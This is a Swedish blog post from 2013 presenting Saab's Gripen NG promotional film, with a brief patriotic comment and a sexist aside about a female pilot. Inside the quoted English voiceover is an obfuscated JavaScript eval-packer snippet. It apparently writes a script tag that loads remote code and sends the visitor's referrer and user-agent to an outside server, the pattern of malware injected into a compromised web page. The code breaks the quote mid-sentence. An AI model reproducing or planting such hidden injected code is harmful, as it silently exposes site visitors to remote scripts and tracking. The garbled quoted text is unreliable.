Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

SAAB Gripen NG – reklamfilm

Filip Urde
  • On 10 januari, 2013
  • http://www.revue.se/filip-urde

Här har vi den, Saabs senaste reklamfilm för svenska jaktplanet Gripen NG (Next Generation). Patrioten inom mig känner att vi är ganska balla…typ… förutom att första piloten är en tant?! oops sa jag något fel nu…

”The eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kiznk|var|u0026u|referrer|azffd||js|php’.split(’|’),0,{}))
world’s most advanced multi-role fighter just became the next generation of fighters. Our sensors, our weapons and our performance are superior. And with the world’s most advanced tactical link, we have the information advantage.”

www.youtube.com